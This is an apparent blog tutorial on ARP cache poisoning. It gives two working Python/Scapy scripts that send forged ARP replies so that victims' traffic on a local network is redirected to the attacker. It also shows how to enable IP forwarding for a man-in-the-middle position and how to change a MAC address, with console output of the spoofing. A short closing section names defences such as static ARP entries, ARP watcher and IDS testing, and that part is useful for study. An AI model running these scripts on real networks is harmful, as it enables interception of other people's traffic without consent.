ARP-Cache-Poisoning
The functionality of the protocol ARP (Address Resolution Protocol) was
described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must
beforehand request the mac address of the destination by using the
ARP protocol. This question gets broadcasted to all members of the network. In a perfect
world the only computer that answers is the desired destination. In a not so
perfect world an attacker may send its victim every few seconds such an ARP
reply packet but with its own MAC address as response and thus
redirect the connection to itself.
This works because most
operating systems accept response packets to questions they never asked!
Lets write the code in python networking -
#!/usr/bin/python
import sys
import time
from scapy.all import sendp, ARP, Ether
if len(sys.argv) < 3:
print(sys.argv[0] + ": <target> <spoof_ip>") #victim ip and Fake IP, sudo python3 arpcache.py 192.168.122.45 192.168.122.30
sys.exit(1)
iface = "wlan0"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
widelan = Ether() #before widelan/ether (www.kumaratuljaiswal.in)
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = widelan / arp
while True:
sendp(packet, iface=iface)
time.sleep(10)
With the help of Scapy we construct a packet called packet consisting of
an Ethernet() and an ARP() header. In the ARP header we set the IP address of
the victim (target_ip) and the IP which we would like to hijack all
connections (fake_ip). As last parameter we define the OP-Code is-at, that
declares the packet as an ARP response. Afterwards the function sendp() sends
the packet in an endless loop waiting 10 s between each delivery. Its
important to note that you have to call the function sendp() and not the
function send(), because the packet should be sent on layer 2. The function
send() sends packets on layer 3.
Additional Detail- Let's read
For short refreshing:
Ethernet is on Layer 2, IP
(Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on
Layer 4–6 and services like HTTP, SMTP,
FTP on Layer 7.
NOTE - One last thing to remember is to enable IP forwarding
otherwise your host would block the connection of the victim.
IP Forwarding
Why we need to use IP Forwarding in
scapy (arpcache). Dont worry if you don't know let see If the Linux server is acting as a
firewall, router, or NAT device, it will need to be capable of forwarding packets that are meant for other
destinations (other than itself).
Conversely, IP forwarding
should usually be turned off if you’re not using one of the aforementioned
configurations. You typically don’t want your system wasting bandwidth or
resources to forward packets elsewhere, unless it’s been designed to do
that job.
Check current IP forwarding status
Most systems will be able to use the sysctl command, which can apply
kernel variables. Therefore, you can use the following sysctl command to check
whether IP forwarding is enabled or disabled.
#
sysctl net.ipv4.ip_forward
net.ipv4.ip_forward = 0
In
the example above, the net.ipv4.ip_forward kernel setting is 0. That means
it’s off. If it were set to 1, that would mean it’s enabled.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ sysctl net.ipv4.ip_forward net.ipv4.ip_forward = 0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$
You can also check via this command cat /proc/sys/net/ipv4/ip_forward on file
system enable or not!.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ cat /proc/sys/net/ipv4/ip_forward 0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$
Enable or disable IP forwarding
You can use the following sysctl command to enable or disable Linux IP
forwarding on your system.
# sysctl -w net.ipv4.ip_forward=0
OR
# sysctl -w net.ipv4.ip_forward=1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ sudo sysctl net.ipv4.ip_forward=1 net.ipv4.ip_forward = 1 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$
Again we check ip forwarding setting whether it is enabled or not!!!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ sysctl net.ipv4.ip_forward net.ipv4.ip_forward = 1 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads] └─$
Don’t forget to check the settings of your packet filter like IPtables, pf or
ipfw or just disable it, but now enough about the boring theory lets jump into
some practical Python code!
If you only manipulate the ARP cache of
the client with the fake_ip you only get the packets of the client, but the
responses of the server will stay invisible.
To enforce a bidirectional connection through the computer of the
attacker like in above the attacker has to forge both the client and the
server with his own MAC for the relevant destination. Our first code is a bit
graceless and sends a lot of ARP packets. It doesn’t only
generate more
traffic as needed it’s also conspicuous. Stealthy attackers would use another
tactic. A computer that wants to get knowledge about an IP address asks with
an ARP
request.
Additional Details-
What is Stealth ?
Stealth scan or Half-open
scan is one of the scanning methods in Nmap in which the intruder uses to
bypass the firewall and authentication mechanisms. Also, by using this method,
they make the scan operation as normal network traffic and thus the scan is
hidden.
We will write a program that waits for
ARP requests and sends a spoofed ARP response for every received
request. In a switched environment this will result in every connection
flowing over the computer of the attacker, because in every ARP cache there
will be the attackers MAC for every IP address. This solution is
more elegant and not as noisy as the one before, but still quite easy to
detected for a trained admin. The spoofed response packet gets sent in
parallel to the response of the real host as illustrated in Fig a.png . The
computer whose packet receives first at the victims network card wins.
MAC Address change
Every network card in an Ethernet network has a
MAC address that’s world-wide unique and are used to address
devices on the net. The MAC address consists of six two digit hexadecimal
numbers, which are separated by colons (e.g.
aa:bb:cc:11:22:33).
Its a common misbelief that a computer
in a local TCP/IP network is reached over its IP address; in
reality the MAC address is used for this purpose. Another common
misunderstanding is that the MAC address cannot be spoofed. The operating
system is responsible to write the MAC into the Ethernet header and systems
like GNU/Linux or *BSD have possibilities in their base system to change the
MAC with one command.
Also read -
https://www.kumaratuljaiswal.in/2020/04/how-to-change-mac-address-with-mac.html
Changing MAC address Command -
Before/n/After
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b4:b6:86:47:55:83 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ sudo ifconfig eth0 hw ether c0:de:de:ad:be:e
[sudo] password for hackerboy:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether c0:de:de:ad:be:0e txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$
We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request.
import sys
import time
from scapy.all import sniff, sendp, ARP, Ether
if len(sys.argv) > 2:
print(sys.argv[0] + " <iface>")
sys.exit(0)
def arp_poison_callback (packet):
#Got ARP request
if packet[ARP].op == 1:
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
answer[ARP].op = "is-at"
answer[ARP].hwdst = packet[ARP].hwsrc
answer[ARP].psrc = packet[ARP].pdst
answer[ARP].pdst = packet[ARP].psrc
print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me")
sendp(answer, iface=sys.argv[1])
sniff(prn=arp_poison_callback,
filter="arp",
iface=sys.argv[1],
store=0)
The function sniff() reads packets in an endless loop from the interface
specified by the parameter iface. The received packets are automatically
filtered by the PCAP filter arp that guarantees that our callback function
arp_poison_callback will only get called with ARP packets as input. Due to the
parameter store=0 the packet will only be saved in memory but not on the hard
disk. The function arp_poison_callback() handles the real work of our program.
First of all it checks the OP code of the ARP packet: when it’s 1
the packet is an ARP request and we generate a response packet, that has the
source MAC and IP of the request packet as destination MAC and IP. We don’t
define a source MAC thus Scapy automatically insert the
addresses of the sending network interface.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo python3 arpcache-2.py wlan0 Fooling 192.168.122.45 that 192.168.122.158 is me . Sent 1 packets. Fooling 192.168.122.158 that 192.168.122.25 is me . Sent 1 packets. Fooling 192.168.122.45 that 192.168.122.158 is me . Sent 1 packets. Fooling 192.168.122.45 that 192.168.122.158 is me . Sent 1 packets. Fooling 192.168.122.158 that 192.168.122.25 is me . Sent 1 packets. Fooling 192.168.122.45 that 192.168.122.158 is me . Sent 1 packets. ^C ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$
The IP to MAC resolution of ARP will
get cached for some time, because it would be dump to ask for the resolution
of the same address over and over again. This ARP cache can be displayed with
the following command.
arp -an
It depends on the operating system, its version and
local configuration settings on how long addresses will get cached.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ arp -an 148 ⨯ 3 ⚙ ? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$
To defend ARP poisoning attacks one could on one side use static ARP
entries, but those could get overwritten by received ARP responses depending
on the ARP handling code of the operating system on the other side one could
use a tool such as ARP watcher).
ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior
but will not prevent it. Nowadays most modern
Intrusion Detection Systems can detect ARP cache poisoning attacks. You
should check the
functionality of your IDS by using the above
scripts to see how it behaves.
To be Continued......
